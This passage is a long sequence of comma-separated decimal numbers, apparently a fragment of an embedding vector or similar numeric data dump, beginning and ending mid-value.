006365465,0.02762265,0.046508405,0.0029591066,-0.031528313,-0.008514538,-0.020080302,-0.008027614,0.0063249087,-0.0101844985,0.00090759876,0.0051565,0.027364535,-0.011179329,-0.015013285,-0.0066078515,0.032284867,-0.010847259,0.0053580888,0.014766293,-0.016652806,0.025183031,-0.009767798,0.05082682,-0.009321149,-0.024108293,-0.005564451,0.012816178,0.01145456,-0.0035703862,-0.00007724936,-0.03309929,0.009337766,0.012113451,0.023105042,0.0066418983,0.024107836,-0.009959281,0.008009,-0.008082503,-0.00071953726,-0.006851714,-0.020675914,0.005644086,-0.008029886,-0.011006742,-0.031591937,-0.021388656,0.013039531,0.027136799,0.010295424,-0.015115753,0.007035675,-0.0038868147,0.0028624935,0.024741579,0.0015564371,-0.00097383803,-0.0045810044,0.02192703,0.0021817281,-0.025122903,0.024667917,-0.008029255,-0.020005045,-0.007450428,0.021757565,0.013695577,-0.028605884,0.008280198,0.010471069,0.0077388687,0.007478234,-0.017391175,-0.00092256913,0.0224902,0.019703362,-0.0012787912,-0.0043222453,0.0072086668,0.0035178773,-0.011397541,0.0057106433,0.0029246495,-0.007200864,0.0014337688,-0.0191495,-0.021625338,-0.0067677456,-0.011419124,0.003983355,-0.017103245,-0.008562222,-0.00072264555,0.012507822,-0.0035376605,-0.008639584,0.011072774,0.015340747,-0.013120418,-0.00003792891,0.008097752,-0.014419029,0.0074717,0.02033779,-0.01632317,0.0048835943,-0.007832385,0.023339126,0.006843012,-0.010070966,0.011265906,-0.022107998,0.0063513857,-0.024942407,0.02231792,-0.00053866813,0.013688941,0.0065088053,-0.01069884,-0.0041350788,-0.0019002111,0.0029010016,-0.0338168,0.0049038576,0.0017739385,0.0456875,-0.008294039,-0.005657175,0.016958164,-0.019284954,0.0029356275,-0.010362342,0.03354272,-0.044690534,-0.0043013585,-0.0006078284,-0.0029681362,-0.0016414752,0.031190576,0.020848263,-0.012052144,-0.0025708736,-0.009799782,-0.017495498,0.021827832,-0.01742097,0.0067411256,-0.00883889,-0.000983889,-0.026542714,-0.024565956,-0.029188093,-0.03680955,-0.035616696,0.059994437,0.0024358833,0.004527918,-0.0034339007,-0.0070474553,-0.005041714,-0.004793509,0.014209474,-0.05223812,-0.0037607139,0.018329483,-0.002263367,0.008360892,-0.008705945,-0.020117657,-0.009277059,-0.02696076,-0.020784669,-0.0010311359,0.011177081,-0.0133963255,-0.014430021,0.008457713,-0.0056585902,0.040833063,-0.022143025,0.0037093419,-0.008953905,0.041332617,0.032516215,0.009943451,0.0010347213,0.023033831,0.004992661,-0.002697289,0.0022837147,0.024366232,0.0037412676,-0.00017986352,0.0031317999,0.0059209215,-0.005222802,-0.029006375,0.012168149,0.01933256,0.03187934,0.0016136434,0.026953507,-0.009254852,0.01888461,-0.0117033245,-0.00976419,-0.017738268,0.039615415,0.019495355,0.020930868,0.032706432,-0.008912738,-0.0024687978,-0.024621282,-0.023199134,-0.01667882,0.038635574,0.018085873,0.0034516605,0.0073857885,-0.0024600113,0.012480993,0.02161327,0.0024424244,-0.0036803344,-0.009260797,-0.027406117,-0.00052887073,-0.018939152,0.0016219201,-0.039509766,0.0011665524,0.0060635703,0.011014765,0.014080009,-0.008476151,0.0051174182,0.0046815234,-0.0031413145,-0.035471145,-0.033922043,-0.0014058241,0.016733626,-0.025280232,0.017299203,0.009507978,0.00812931,0.024923395,0.010384034,-0.040438328,-0.011408539,0.012563457,-0.01595242,0.0092573045,-0.002651129,0.0137286475,-0.009314772,0.0016058732,-0.003667948,-0.011513593,-0.0044960654,0.007802008,-0.010427195,0.017806804,-0.014995429,0.010629692,0.011236304,-0.033770483,0.0005938368,0.015891625,-0.03140298,-0.02920744,0.0010732668,0.021532068,-0.01930971,0.023306169,-0.013789253,0.017205326,0.034169566,-0.0140403565,0.013582345,-0.016596233,0.0022604177,0.030750262,0.023421802,-0.019484326,-0.028544314,-0.010079003,0.02884646,-0.017888479,0.0058721257,-0.00020418674,-0.02151002,-0.027028501,-0.033758078,0.0041549522,-0.01554412,0.0040785368,0.004151201,-0.0042402083,0.03464179,-0.020999502,0.021746615,0.0004604938,-0.00047704752,0.010599978,-0.008403776,0.01425372,-0.021370234,-0.020801425,0.036400616,-0.027010353,0.019558972,0.013955121,-0.034686435,-0.014930737,-0.03421525,-0.0099478755,-0.022640796,0.023832746,0.0039505926,-0.012306765,-0.022087276,0.04243742,-0.0029137856,0.019140916,-0.01538828,-0.0027293132,0.0017492276,-0.0055917036,0.0108642,0.023202127,-0.023609878,-0.0069132955,0.003755389,0.011435368,0.018316466,-0.006840161,-0.000022006754,-0.01979016,0.005469149,-0.005330187,-0.008430051,0.035710223,-0.012432107,0.0075533334,0.03441065,-0.010379939,0.014076707,-0.00621143,-0.022647727,-0.0037344794,-0.0050442503,0.0064020175,-0.019606216,0.017348133,0.00045521389,0.0020051098,0.0028367904,0.0030689102,0.01915608,-0.01496225,0.0051698983,0.037154056,0.01236116,-0.023851464,-0.002006329,-0.023567792,-0.0009297889,-0.009797877,0.008855293,0.00020910348,0.0011425184,0.024572436,-0.00974625,-0.018913228,0.032827627,-0.02560153,0.0039867964,0.033656396,0.019880688,-0.024934461,0.0076023475,0.011476306,-0.04399944,0.008504962,-0.006868101,-0.012374151,0.02047255,-0.023762116,0.008901876,0.012767034,-0.008881885,0.009651267,0.007830882,-0.0123193795,-0.012275885,0.00542175,-0.013881073,0.015003739,0.014760812,0.0055576377,-0.010275978,0.004212363,-0.014929888,-0.021749016,0.01058055,-0.007846634,0.009952697,0.023974873,0.006940433,0.0015493523,-0.007523647,-0.006697082,0.025588073,0.028634546,-0.021901986,0.018023487,-0.011337938,-0.02777955,0.008203069,0.0010243912,-0.042864054,-0.00035008535,-0.015972335,0.0075414088,-0.021061964,-0.016215125,-0.0010084364,-0.061687414,0.023344079,-0.02978378,-0.020249603,-0.005268636,-0.0003567018,0.01539519,-0.0054628393,0.042075045,-0.0011356879,0.0014958986,-0.0034731322,0.020540923,0.012601921,0.009114497,-0.0068448344,-0.015364475,0.038082395,0.044698518,0.0074094743,0.005853277,-0.015818192,0.013402019,0.01564089,0.027427163,0.009003448,-0.02076624,-0.014577102,-0.039446857,-0.0070792306,0.0032988717,0.024874374,-0.0009404678,-0.003401394,-0.010789888,0.006188838,0.007428067,-0.0036592246,-0.016878618,-0.0012489947,-0.019323323,-0.012087211,0.0055144066,0.026356239,-0.008376352,-0.056863796,0.011184083,-0.0010441424,-0.0036969015,0.010905826,0.04210448,0.0013581632,-0.0015057714,0.013267888,-0.0014534942,0.028396606,-0.021288507,0.0012764608,-0.008982614,-0.0011275137,0.0067957863,-0.009835105,0.019051263,0.018264923,-0.029463764,-0.010075975,-0.021128733,0.026503632,-0.012262807,0.0069913324,-0.0056430483,-0.014334544,-0.03742431,-0.007897651,-0.031875163,0.013192705,-0.008650145,-0.01330208,-0.0067226337,-0.015846264,-0.012967705,0.02637598,-0.031022688,-0.004582083,-0.035905544,-0.014510001,0.0035598448,0.012366923,0.00037917992,-0.011613689,-0.008753443,-0.0007707336,0.0112948,0.026025016,-0.005445944,0.01239138,0.015070651,0.014978231,0.0033010636,-0.011812918,0.024071753,-0.0025057816,0.0022789703,0.048765592,0.0016820143,0.0011824743,0.007799984,0.0005164475,0.024993243,0.02362932,-0.012829615,0.0045488975,-0.018562058,0.013530344,0.009211737,0.009836841,0.0051000174,0.022239767,0.017970685,0.03559852,-0.012579309,0.0032447658,0.028930636,0.0089614475,0.0062280754,0.0018662086,0.018449977,0.0015127789,-0.015238958,-0.016907668,-0.0043169553,0.01862624,-0.0018903781,-0.013446586,0.02410091,0.0035475597,-0.0051000724,-0.037297834,-0.0010330159,-0.012685853,-0.01682414,0.007166161,-0.012371374,0.019605022,0.0013169181,-0.03818633,-0.002663428,-0.0026786113,-0.005525628,-0.0008240542,-0.016508177,0.025767663,0.012984073,-0.00028259313,0.0052901777,-0.0013729674,-0.022371214,-0.02132087,-0.0000027189906,0.011883995,0.0020405366,-0.0068380223,-0.022586703,0.00085729745,-0.033860423,0.013253,-0.02950209,-0.0059761973,-0.014521588,-0.008748216,0.0046574487,0.019338313,-0.00040609695,0.01760708,0.001827776,-0.011954955,0.029827878,0.009258274,-0.023683393,-0.000045971625,0.0019523748,0.03941502,0.010121623,-0.022617731,0.014400223,-0.0068149553,-0.009714925,-0.026042866,0.0005980076,-0.031183567,-0.01690999,-0.0020502557,0.0046641077,0.010844089,-0.017445289,0.033363253,-0.011555094,0.02621733,0.013767601,-0.035215333,-0.004108059,0.027035583,0.009988552,0.015625153,-0.022699311,0.0066728876,-0.0066274335,-0.05496106,-0.010862093,0.007056761,0.0009051009,-0.028633526,0.002576894,-0.01122348,-0.025468213,-0.008361614,-0.016520219,-0.009002541,0.018012974,-0.014947033,0.0026199038,0.013601869,0.0052603185,-0.0017724566,-0.0023286399,-0.010174831,0.017371943,0.01121966,-0.00042493842,-0.0073161568,0.040836114,-0.025087634,0.043739233,0.018839821,-0.007598214,-0.0023997407,-0.02554826,0.0022714923,-0.02692692,-0.012688559,-0.005147593,-0.0028620372,0.011710438,-0.0020146074,-0.010262929,0.030618357,-0.012768661,-0.010267457,0.0047111665,0.024793832,-0.014914135,0.0022636415,0.019538537,0.00011426503,-0.013564076,-0.0017184378,-0.009392309,-0.019890701,0.002249303,-0.007272822,-0.008267685,-0.00574934,-0.013950338,0.009768374,-0.022940798,0.009331291,-0.015171152,0.012335554,0.030952204,-0.005206082,-0.009002658,0.0069822436,-0.008368255,0.013710783,0.019983776,0.008302067,-0.008743886,-0.011102317,0.016485626,0.0223527,0.016161736,-0.013093044,-0.0026019248,-0.029277917,0.018495742,0.015176941,-0.00067084626,-0.014774118,0.032404765,0.00012821548,-0.01159569,-0.01537163,0.008062667,0.0033508313,0.014570708,-0.009220221,-0.012147882,0.013714623,-0.005635156,-0.009494721,0.05861046,-0.01135055,0.008854336,0.009219486,0.020708423,-0.010757225,0.0131514855,0.016577847,0.02287828,-0.004470908,-0.020916604,-0.017299738,-0.011671136,-0.0034693049,0.008634812,-0.017577427,-0.018772826,0.010181619,-0.009906988,0.0260097,0.011547239,0.015063732,-0.0029596572,-0.003247839,0.024039898,0.0157981,0.018998962,-0.01599387,0.014778941,-0.0011247916,-0.0030834042,-0.026188368,-0.0047117285,-0.0032279955,-0.024614206,0.0029782073,0.001174393,-0.0076672793,-0.03244541,0.026256954,0.015988693,-0.008689523,0.040799685,-0.013085508,0.006324406,-0.023131339,-0.010390306,-0.0046620574,-0.0034255083,-0.03474745,0.009442439,-0.00036997063,-0.009339215,0.015316626,-0.015425138,0.0048898393,0.013247393,0.0151928635,0.024058037,-0.020873008,0.0069594425,0.009282938,0.006070614,-0.004982755,-0.006967228,-0.006446333,-0.011188596,0.0021014074,0.012181111,-0.026865745,-0.0035131115,-0.0019021708,0.024081502,0.020740105,-0.014452072,-0.0039033538,-0.0083039375,0.0064191376,-0.023841001,-0.026697977,-0.0033522653,-0.0022574165,0.023061188,0.020488543,-0.021567335,0.0069928486,0.017039405,-0.0016918294,0.062124263,-0.0027266128,0.007941043,0.015728002,-0.008716439,0.016264811,0.0015670991,0.017264893,-0.008985157,0.0099790245,-0.021033708,0.01794498,-0.012315202,0.00995165,0.024782943,-0.034531634,0.028948618,-0.007225482,-0.009295382,-0.024148215,0.011190845,0.0328948,0.0017052678,-0.00070909044,-0.009059762,-0.0073844437,-0.0038671584,-0.0087069655,0.015487719,-0.0245435,0.0021261375,0.020823672,0.0094010355,-0.0034332112,-0.026001401,-0.040933892,0.0065266243,0.08068275,-0.02847976,0.0069491235,0.008761319,-0.0034821678,0.014867439,-0.0894342,-0.0043971254,-0.0028563023,-0.018216662,0.0042585167,-0.014723738,-0.006132741,0.0118631795,0.024279563,-0.010725507,-0.019486733,-0.024247922,0.04501007,-0.013465496,0.005393226,0.0122025,-0.0027475923,0.005030091,-0.03405677,0.0068214918,0.015515284,-0.010244699,-0.013525503,-0.015648594,0.0021549186,-0.009044292,0.021305395,0.0065080146,-0.01028518,0.0065542078,0.004393884,0.002030575,-0.010392716,-0.013308461,0.04341778,0.0087875845,-0.014398966,-0.03762048,-0.10506566,-0.0002754577,-0.005013005,-0.03174878,0.025527474,-0.019740513,-0.0028510245,-0.00019259244,0.009611253,-0.009719266,0.012301995,0.024547733,-0.0015420831,0.0017838549,-0.02276046,0.005308328,0.009690012,0.00676643,-0.001936822,0.000764369,0.018860381,0.0050289547,0.0039574695,-0.0062101413,-0.02199556,0.009243899,0.005665125,0.03486212,0.019448703,-0.00399478,-0.0062255855,0.012710847,-0.028518952,0.0028045387,0.00048645717,-0.0039687143,-0.0036132247,0.02251499,-0.0056783874,0.024030054,0.0034027575,-0.019676808,-0.007311181,-0.0018916598,0.0034351856,0.034691654,-0.0047889403,-0.003658133,0.012913991,0.0021314395,0.01824997,-0.011145159,-0.031144073,0.020410385,-0.0097604515,-0.0022919544,-0.01956342,-0.021424484,-0.022279825,0.014829783,-0.011836291,-0.02168265,-0.0047944975,-0.010327741,0.030151173,-0.007098489,0.01668778,-0.02654706,0.0021911769,-0.009499873,-0.012770358,0.013801397,-0.00522997,-0.009520518,0.007611655,0.010646207,0.0029880507,0.01399235,0.03386501,0.0002490733,0.036137443,-0.006841873,0.020670654,-0.032609537,0.0052199275,-0.0033441393,-0.01008332,0.0070804204,0.000026504358,-0.014221181,0.027790966,-0.015136632,0.0069022146,-0.017983437,0.027933685,0.01487334,0.037602242,-0.00020648213,-0.0328453,0.008600593,0.018070761,-0.010531071,-0.016759323,-0.008030751,-0.0116475485,0.017810272,-0.0028381487,-0.005569355,-0.020139027,-0.012956774,-0.013458808,-0.010706465,0.028682942,-0.0030156318,-0.023610398,-0.027399175,0.009283488,0.001963901,0.00812587,-0.026669351,-0.016086528,0.03292706,-0.004569669,0.012329577,0.025767881,0.026438968,-0.029462818,-0.0126667395,-0.021394895,0.013871579,-0.014016255,0.0021195123,-0.004236953,0.007742001,-0.012650149,0.00045124878,-0.012946366,-0.0036240462,-0.033615828,-0.023885716,-0.013622152,0.021874504,-0.022343438,0.0017678799,0.021535356,-0.007152825,0.04086283,0.009749707,0.013279696,-0.011785558,-0.0062749656,0.013428364,-0.037164792,-0.001160008,0.02055719,0.040388875,-0.0017041438,-0.0161338,0.02877699,0.02766412,0.017729528,0.010422655,-0.028033687,0.0106682135,-0.02332432,-0.014015284,0.00051822484,-0.014386269,0.025761118,-0.02328095,0.009951093,0.011878526,0.03868435,0.010449631,0.011991616,0.017017903,-0.0039037128,-0.018075675,0.0029192606,0.02180861,0.0063872887,0.025265686,0.0062034884,-0.012165284,0.004707669,0.0029346794,-0.0126723545,0.0073767407,0.0049184123,0.016930278,-0.024249677,-0.021232579,0.0021554579,0.00003652525,-0.021263834,-0.004071535,0.011956192,0.00051760545,-0.030944472,-0.011657261,-0.021594549,-0.008175824,0.0090028485,0.021472689,-0.009352717,0.006345228,0.023923326,-0.0006402049,-0.027247552,0.01530056,-0.0036538478,-0.0006516916,0.0057538375,0.0042078677,-0.0136866765,-0.011038184,-0.019556055,-0.034069896,-0.012652194,-0.0019165707,0.0029762785,0.0072692423,-0.019973638,-0.0134032965,0.010370563,-0.019323373,-0.004382334,-0.037857838,0.0067634424,0.004273411,0.002441961,-0.0000036535187,-0.008326839,-0.0201367,0.023707649,0.017985849,0.016839689,0.0011053513,-0.009266909,0.015064128,-0.01913485,-0.013110752,0.023226859,-0.017613055,0.0027071799,0.012797579,0.005323318,0.027818426,-0.0018491893,0.003965334,0.027468419,0.01879966,-0.0019437121,0.010622489,0.002719785,0.034517575,0.020814078,0.0032890758,-0.019044269,0.0026321728,-0.0039539374,-0.008092895,0.0064155473,0.01183299,-0.0030764705,-0.0053767716,-0.0060619344,0.018279336,-0.027570914,-0.020361127,0.060643703,0.013197547,0.022681676,0.023683943,0.0021210378,-0.010878797,-0.010988409,0.0038633826,0.0025639401,0.050456993,-0.014040084,0.020714544,0.01886419,-0.01829262,0.03789036,-0.015592159,0.032319758,0.025309436,-0.0029036521,0.007058302,-0.0008664222,0.029539952,0.005095551,0.0028696593,0.003351187,0.0016833188,-0.02261021,0.014962581,0.013405551,-0.024349254,0.0043350523,-0.0059218286,0.004176107,-0.023823226,0.010063132,-0.022906117,0.0037047544,0.0041087945,0.01152745,0.02336573,0.024595223,-0.03100587,-0.0064461906,-0.021148514,-0.0048903814,-0.0071078455,0.024378952,0.019246982,-0.0047164536,-0.024682606,0.02404468,0.038814742,-0.016623495,0.040641095,0.00061982934,-0.003964026,-0.010844676,-0.0076253107,-0.008748153,0.0076285186,0.00030188976,-0.0030299933,0.021919936,-0.016680216,-0.024879996,0.018004065,0.004587087,-0.00088753685,-0.0017123797,0.009639926,0.00800387,0.003975275,0.02107386,-0.017146057,0.0058968654,-0.030039087,-0.00939102,-0.004384242,0.002987963,-0.006396221,0.000088880995,0.013167507,-0.012108865,0.018334394,0.029453522,0.0072981524,0.009365128,-0.03127534,-0.026805371,0.013316421,-0.032720115,-0.004714548,-0.021084761,-0.000892429,-0.0013770488,-0.013146793,0.009661196,-0.010361728,0.016133888,-0.029798245,-0.011763079,-0.020721676,0.023522904,0.006066908,-0.019622661,0.015516227,-0.0037667975,0.009990119,-0.0016124904,-0.0005801637,0.009619224,-0.037491,0.06362617,-0.034507483,0.0006132721,-0.009338766,0.02191228,0.016139496,-0.0061168964,-0.001414141,-0.007556871,-0.018537698,-0.005716254,-0.02322854,0.006702596,-0.0058941073,-0.024882264,-0.04387981,-0.009255831,-0.017728193,-0.013330758,-0.007466583,0.03578537,-0.0032111702,0.026444498,0.0009727768,-0.0035304795,-0.03928423,0.00948426,0.02062722,-0.027347228,0.015715312,0.009485839,0.0024796766,-0.021945728,-0.0059945406,-0.031135146,-0.011521421,-0.019735573,-0.016101426,0.0076997858,0.013764281,0.03590995,0.003286197,-0.007701447,-0.0071391496,-0.007950206,-0.003938554,0.009007774,0.005033243,-0.0047268076,-0.0042215073,-0.011437305,-0.0005534367,0.01229649,0.018240595,-0.0060288557,0.021755446,0.0057062916,0.003977423,0.01193491,-0.0050016944,0.037304394,-0.00931336,-0.04947099,-0.011705925,0.021533202,0.014701823,-0.015252921,-0.026892759,-0.017340822,-0.018710002,-0.012461778,0.024761949,0.011116556,0.017064381,0.0050705248,0.017415669,0.008424014,-0.003571321,0.0038041077,0.018283915,0.002482882,0.024717225,-0.007286039,-0.009961162,-0.001505738,0.012339256,0.0075767534,0.007934842,0.0013215522,0.036776006,0.040429037,-0.010588665,0.014600183,0.005562664,-0.0014444896,0.012368257,-0.009252436,-0.031959154,0.020422455,-0.028607499,-0.029164901,-0.0053930855,-0.003859213,-0.0063004917,-0.010339072,0.0101631675,-0.09291675,0.0204603,-0.023212094,-0.0097779175,-0.0066302274,-0.005639793,-0.0029603422,0.016094588,0.0030980725,-0.02028914,0.0010448401,0.027720515,-0.005922368,-0.009031731,-0.0069583156,-0.0015074072,-0.014938714,0.0042790934,-0.009578613,0.0031663221,0.035225045,-0.03579654,-0.00893154,-0.017181402,0.021847848,-0.0010300933,-0.003962717,0.008844596,-0.0062240786,0.016939014,-0.0033352626,0.020844245,0.001089113,0.020423822,0.013188996,-0.0014835718,-0.023510585,0.019281682,0.012139777,0.015914528,0.002727992,0.010396206,-0.012806324,-0.0016115597,0.020835245,-0.0011054623,0.008580401,0.018268755,0.012146082,0.035378937,-0.030914793,-0.01269145,0.010799041,0.0044443905,-0.0026908123,-0.001128932,-0.002255712,0.0038657903,0.016636759,0.004949311,-0.019334327,-0.0007982097,0.0030931123,-0.0105884485,0.017754002,0.010990785,0.007143001,0.006922207,-0.03143453,0.018226285,-0.022214258,0.007217628,-0.0062643387,0.0051366976,-0.01612813,0.010436419,-0.0032844495,-0.007874628,-0.0021494746,0.019900654,-0.039759707,0.0030499694,-0.0009581787,0.03488786,0.00935889,-0.016339213,0.016225088,0.0007269826,-0.02209779,0.0010532854,0.00250771,0.0013400691,-0.0066901976,-0.032902732,-0.010954446,0.0067358636,-0.009529157,0.017642604,-0.003353326,-0.0025099467,-0.010856072,0.0021272155,0.007103576,-0.029306732,-0.078435086,-0.00011110765,-0.0013164894,-0.0007910514,-0.00053707446,-0.008426406,0.015672533,-0.0028041846,0.045002583,0.010562888,-0.013448148,0.0005678132,-0.006932864,0.0013952872,0.0038902618,0.013045137,-0.026699021,0.009097179,-0.006204737,-0.009371559,0.0059308643,-0.010899841,0.0003267503,0.023280717,0.006579304,0.004335107,0.0154341115,0.03651607,0.01395867,-0.010211194,-0.0023885528,0.0023514142,-0.0066691847,0.00498154,-0.023312273,-0.0126370285,0.018894736,0.0038112167,0.008458715,0.026824065,0.025409974,-0.0092880465,0.012998345,0.020107754,-0.0017319408,0.0066744853,-0.011534776,0.026630478,-0.030834379,-0.003298191,-0.0018312115,0.00060096994,-0.0010889338,-0.011383931,0.00003176768,-0.026214693,-0.022865016,-0.0021390335,0.028859185,-0.0021481868,-0.0020337685,0.01670042,-0.005734068,0.006234918,-0.0053356774,0.026325075,-0.006971733,0.005410515,0.0031313042,-0.012948179,-0.0034702064,0.022078,0.0062433365,-0.01262453,0.02016111,-0.0033575266,0.022154009,0.03209349,0.0087581305,-0.010194988,0.0074357237,-0.0468916,-0.004235666,0.012761241,-0.031769186,0.011383647,0.0030814155,-0.0071802833,-0.0018456358,0.0013662658,0.020600798,0.01716726,-0.012369152,0.031997047,0.0021235053,0.012630498,0.0435474,0.0048642326,-0.008066984,-0.033273026,-0.008675319,-0.015759587,-0.008490007,0.01353838,-0.021413846,0.015884578,0.007379849,-0.015333937,-0.0018333589,-0.011193259,0.012049791,0.031486787,-0.0073216776,0.010771785,0.023148715,0.0016899192,-0.01895688,-0.018604157,-0.004974492,-0.007945303,-0.0026063062,0.020687066,0.019029954,-0.013622542,0.0070371074,-0.016142342,-0.015791962,0.029599274,0.017249651,-0.018853366,-0.00016737313,0.01777637,0.005054955,-0.0013425719,-0.008478756,0.015078693,-0.018519815,-0.0013488866,-0.007510988,-0.0043016495,-0.005266685,-0.0057740663,0.021009428,-0.011315574,0.013925447,0.012033357,-0.008610852,-0.00018356662,-0.02944695,0.014622305,-0.0074317767,0.010392931,0.016313257,0.029934896,-0.008189344,0.00694074,-0.021542866,0.007280683,-0.0025049788,0.0183003,-0.007658296,0.024059309,0.026952706,-0.002301662,-0.008290102,0.001904756,-0.012119388,-0.014132013,0.00095820706,0.0012951172,-0.008541434,-0.009262592,0.03208043,-0.026600542,0.012408512,0.0071498817,0.033507414,0.011860752,0.03665818,0.030275363,-0.005117139,0.016054831,-0.007820444,-0.017828234,0.013319088,0.014353183,0.0111599555,-0.00017542699,-0.016877899,-0.006494352,0.024022607,0.013484427,-0.01946494,-0.022587769,0.010438083,-0.0066519016,-0.002574569,0.013084635,0.011231949,-0.014651237,-0.019616397,-0.009431263,0.013835119,-0.011773001,0.0038360301,0.002633623,0.002419756,0.030689074,0.016154546,-0.0054619913,-0.0073347264,0.014554982,-0.0038597193,-0.009470197,0.010477062,0.016575914,-0.001535713,-0.012340905,-0.006957306,0.023374205,-0.016410805,-0.023163417,0.004603454,0.00761419,-0.00902541,0.031208318,0.0144506935,0.02000616,-0.013980911,-0.01162599,0.012289128,-0.005603799,-0.019203857,-0.003244986,-0.010726285,0.0034331656,0.025643839,0.004172696,0.0057842135,0.031749688,0.027337011,0.028177889,0.019075647,0.024480715,0.014171412,0.007989479,0.0015431265,0.015999405,0.024658676,0.029905858,-0.0012688689,-0.007359522,-0.0016720186,-0.018763797,0.010075878,-0.0009053472,0.009041195,0.0011240433,-0.0043761283,0.010874895,-0.02311341,-0.006127923,-0.023239272,0.0052333595,0.007523867,-0.005299465,-0.012003697,-0.032611307,-0.013065477,-0.009467528,0.025089078,0.0031896932,-0.013614656,0.015124543,-0.013121799,-0.010948958,0.0019323634,0.0031573563,0.017578047,-0.0091925245,0.0048382953,-0.000642004,0.0012770509,0.023658011,-0.006140435,-0.0010733732,0.012125442,0.021929365,-0.029242357,-0.012299622,0.013585102,-0.004199272,0.004029499,-0.00063619483,0.009763257,-0.003022669,0.027480215,-0.0031415,-0.008562407,0.023834312,0.02447906,-0.01225184,0.0013749286,0.00015571597,0.022973519,-0.0010900783,-0.004721056,0.008345072,0.0009957603,0.0017136035,-0.02559084,0.025740884,-0.01343173,0.028338796,0.012387682,-0.003036563,-0.0018770562,0.0030216281,-0.043050356,-0.007304222,-0.00018511474,-0.01072049,0.029490277,-0.0063932063,-0.004650337,0.019758973,-0.013310861,0.042635366,-0.010194863,-0.014734191,0.0077584498,-0.06307748,-0.0060383203,-0.0030225927,0.015229084,0.0024916877,0.019234678,0.038658623,-0.03485294,0.031052453,-0.0042610406,0.0055883345,-0.0020050867,-0.0035898003,0.0016727619,0.008987824,-0.004222131,0.012442427,0.0103142755,-0.0032135192,-0.006753728,0.0034501278,-0.006894689,-0.012423846,-0.029292872,0.03535167,-0.032247227,-0.004877662,0.017824586,0.010771221,-0.0059976187,0.010949859,-0.012828387,-0.022661394,0.022254799,-0.022549951,-0.006328981,0.024139272,-0.03331583,0.008961279,0.00021209224,0.022885311,-0.031977694,-0.027381897,-0.019376801,-0.079626106,-0.0067641656,-0.008755987,0.00745119,0.03799586,-0.010955233,0.007863644,-0.008963743,-0.0015380137,0.02118468,-0.0038138847,0.014225676,-0.011316174,0.0172741,0.051455908,-0.013709873,0.0005061234,0.009915288,0.0039490415,-0.04653693,0.020140206,0.0040587774,-0.016825588,-0.0013462278,0.02926612,-0.020152224,-0.017323293,-0.004767651,0.007888346,-0.00039810082,-0.0046682544,-0.0017290659,-0.0006280896,-0.0075536924,-0.019146636,0.00053808826,0.0057623824,0.025086315,-0.027666759,-0.045144115,0.016087525,0.026558988,-0.003492007,0.0075334394,-0.024233017,0.0070842453,-0.020101331,-0.009939651,-0.017576901,-0.0019280801,-0.0018810983,-0.0063853175,-0.010851848,0.018564953,0.010504961,0.0070333974,0.00071327586,-0.0039288015,0.02834177,0.0027673456,-0.028816232,-0.0133250095,0.014181085,0.0064740293,-0.006303864,0.0004884251,0.0045786025,0.014342439,-0.0017878707,0.00959823,0.023379346,-0.029802259,-0.01539892,-0.0043615485,-0.008890523,0.0022306475,0.007800894,-0.025501348,-0.007819298,-0.007840887,0.015352464,-0.0029817978,0.019629972,-0.004432988,0.016318772,0.009638179,-0.014722403,0.0069057127,0.045320757,-0.0081206355,-0.022818485,-0.017320987,0.039416384,-0.007721135,0.013169993,0.008631968,-0.011886034,0.02086781,-0.0023083393,0.0017487031,-0.0014003988,-0.011706157,0.0059513696,-0.01898053,-0.02235993,-0.0052722725,-0.0069521633,0.00074838,0.005773313,-0.0058751763,-0.031843282,0.018053804,0.01909412,0.04010339,0.00022876209,0.0047589676,-0.014048455,0.016672226,-0.02077672,-0.02472013,-0.0041807364,-0.014132843,-0.0202932,0.029299095,0.019141298,-0.010784472,0.011647484,-0.007754933,-0.024013124,0.012984596,-0.016077874,-0.00059005915,0.01999787,0.022697747,-0.0120483,-0.0023427813,0.011372396,0.03339466,-0.0068073226,0.014548667,0.016134402,-0.017980063,0.006634343,-0.017932832,-0.02077067,0.028733259,0.019021492,0.0062076016,0.004423357,-0.008892103,0.00018887389,-0.00023232012,-0.017069135,-0.010456799,-0.0011021502,-0.0039264215,0.01100606,0.00086127326,-0.035771612,-0.008425428,-0.0017529129,0.0032110764,0.0034830195,-0.014963422,-0.025368804,0.0044704694,0.007084702,-0.008237776,-0.003927037,0.005910479,-0.017516434,-0.0129141025,0.0011244136,-0.011916213,-0.014796919,-0.011473352,0.026089195,0.026772521,-0.0038146311,-0.0038624213,-0.029876363,0.02831938,0.004487148,-0.016968878,-0.006752888,-0.020268537,-0.004758278,0.0030084543,0.030077484,-0.01931546,0.0029783489,0.000057616602,-0.00873725,-0.017722774,0.0051158993,-0.02406839,-0.0061558955,0.003918543,-0.013667382,-0.0049165674,-0.009796774,0.01598766,-0.020471608,0.026196614,0.043244623,0.0121305445,0.011666186,0.01862918,0.0011855438,0.028016428,-0.0058021755,0.008711946,0.027784582,0.07074922,0.021854982,0.0074198907,-0.023300242,0.01856893,0.0014560374,0.022993574,-0.008010128,-0.003963004,0.021242652,0.025865715,-0.018454919,0.017030085,-0.00738491,0.0015036343,0.019650463,0.0066888914,-0.023035955,0.030451903,0.023566712,0.008944865,-0.01735947,-0.019726599,-0.036830947,-0.010165346,-0.044652008,0.01774491,0.025782408,-0.001722584,0.026226537,-0.016527448,-0.013520231,0.0029559974,0.0048833266,-0.027431212,0.012622356,0.015187409,-0.008563101,0.004920422,-0.012351181,0.010943037,0.0066863587,-0.007222451,-0.019516174,-0.026614316,-0.004892058,-0.0041994066,-0.022061946,-0.0068360483,-0.027406322,-0.017835958,0.0046576047,0.005982797,0.0038492603,0.01001338,-0.022761218,0.014914192,0.022826826,0.004189647,0.009487527,0.016067548,0.020095259,-0.0049060937,-0.0127472365,0.018937381,-0.013601215,-0.021285873,0.0002151763,-0.01207205,-0.0066285105,0.007643107,-0.001974011,0.0027209409,-0.0026590403,-0.015328127,0.009871786,-0.0103448415,0.0011618958,-0.004487178,0.01139889,0.0040566893,-0.01743816,0.0034963265,0.008199141,0.015424724,0.012388207,-0.0130150635,0.018743137,-0.0091765905,-0.018074164,0.0044971975,0.02339624,0.015309181,0.0081788255,-0.021243196,0.010312835,0.010043722,-0.010307352,-0.008274013,-0.0024119683,-0.01778255,-0.025592422,0.008247983,-0.0009215194,0.0027315882,0.0028115734,-0.011807017,0.014959284,-0.024971465,-0.008289086,-0.00198994,0.020056607,0.0028835332,0.016264826,-0.010616643,0.045556836,-0.024841607,-0.0026813315,0.018956734,-0.028032245,0.0030761675,0.028408032,0.006602098,0.034043323,0.00925123,-0.0055670417,-0.011851875,0.0073630204,-0.01288831,-0.003777724,0